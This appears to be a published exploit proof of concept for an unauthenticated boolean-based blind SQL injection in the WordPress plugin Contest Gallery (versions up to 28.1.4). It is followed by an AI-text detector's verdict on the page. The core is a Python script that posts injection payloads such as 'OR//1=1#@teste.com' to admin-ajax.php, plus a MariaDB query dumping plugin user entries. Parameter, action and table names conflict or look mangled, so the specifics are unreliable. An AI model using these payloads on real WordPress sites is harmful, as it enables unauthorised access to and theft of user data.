Skip to content
Chimera readability score 79 out of 100, Expert reading level.

Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection

Google Dork: N/A

Date: 2026-06-02

Exploit Author: cardosource

Vendor Homepage: https://contest-gallery.com/

Software Link: https://wordpress.org/plugins/contest-gallery/

Version: <= 28.1.4

Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment)

CVE: 2026-3180

"""

Description

A Blind SQL Injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier. The issue is caused by the unsafe use of the cgl_maili parameter, where sanitize_email() preserves the single quote (') character in the local part of an email address. As a result, user-controlled input reaches wpdb->get_row() without proper parameterization via prepare(), allowing unauthenticated attackers to perform boolean-based blind SQL injection.

Authentication Required: No

"""

import requests

import json

NONCE = " "

URL = "http://localhost:8080/wp-admin/admin-ajax.php"

endpoint = "/wp-admin/admin-ajax.php"

url = "http://localhost:8080/"

payload = "'OR//1=1#@teste.com' and 'OR//1=2#@teste.com"

def send_payload(mail):

data = {

"action": "post_cg1l_resend_unconfirmed_mail_frontend",

"cgl_mail": mail,

"cgl_page_id": "1",

"cgl_activation_key": "",

"cg_nonce": NONCE,

}

return requests.post(URL, data=data)

r_true = send_payload("qualquer'OR//1=1#@teste.com")

if r_true.status_code == 200:

status_code = r_true.status_code

banner = f"""

CVE : 2026-3180 | Contest Gallery 28.1.4 : Boolean SQLi

payload :........................{payload}

end point :........................{endpoint}

url :..............................{url}

status :...........................{status_code}

nonce :............................{NONCE}

"""

print(banner)

print(f"Body length: {len(r_true.text)} chars")

poc =f'''\nmariadb wordpress_db -e "

SELECT * FROM wp_contest_gal1ery_create_user_entries

ORDER BY Tstamp DESC LIMIT 1115;"'''

print(poc)

Sentinel — Human

Confidence

This text exhibits the high specificity, domain expertise, and structured presentation typical of human security research and exploit development, making synthetic origin highly unlikely.

Signals Detected
low severity: Human writers are erratic (implied by varied sentence structure and directness). No uniform rhythm.
low severity: Strong, focused technical narrative. Absence of the suspicious 'balanced' framing characteristic of generic AI output.
low severity: Matches a precise, verifiable template (CVE report/exploit demonstration). Claims are specific and require domain expertise to generate.
low severity: The inclusion of executable code and highly specific technical details (function names, parameterization errors) suggests human-generated research rather than simple synthetic fabrication.
Human Indicators
Specific chain of logical reasoning tied directly to a vulnerability analysis.
Use of complex, domain-specific terminology (e.g., cgl_maili parameter, wpdb->get_row(), boolean-based blind SQL injection).
The code structure and payload are contextually integrated and demonstrate specific technical knowledge.